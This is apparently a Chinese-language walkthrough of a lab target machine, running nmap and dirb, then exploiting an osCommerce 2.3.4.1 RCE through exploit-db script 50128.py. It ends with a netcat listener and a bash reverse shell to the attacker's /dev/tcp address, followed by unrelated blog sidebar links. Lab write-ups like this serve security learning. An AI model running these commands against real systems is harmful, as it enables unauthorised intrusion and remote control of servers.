渗透思路:
nmap扫描端口----dirb扫描网站目录----利用osCommerce v2.3.4.1的rce漏洞getshell----pspy64s发现定时任务----信息泄漏获得root密码----su输入密码提权
环境信息:靶机:192.168.101.72
攻击机:192.168.101.34
具体步骤: 1、nmap扫描sudo nmap -sV -sC -p- 192.168.101.72
扫描到22(ssh)、80(http)、25、110、143(这三个都和邮件有关)
dirb http://192.168.101.72
扫描到一个有意思的http://192.168.101.72/catalog/
浏览器访问http://192.168.101.72/catalog/,发现一个网站安装页面,并且从这个页面可以知道,这个站点使用了osCommerce v2.3.4.1
使用searchsploit查找osCommerce
searchsploit osCommerce
找到一堆版本相符的exp,我选了下图最下面这行RCE的exp,50128.py
找到这个exp的绝对路径
searchsploit -p php/webapps/50128.py
将exp拷贝到当前文件夹
cp /usr/share/exploitdb/exploits/php/webapps/50128.py ./50128.py
执行exp
python3 50128.py http://192.168.101.72/catalog
给出成功提示后,在攻击机上另起一个shell监听8888端口
nc -nlvp 8888
在exp执行成功的RCE_SHELL中输入
bash -c "exec bash -i &>/dev/tcp/192.168.101.34/8888
关注
打赏
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?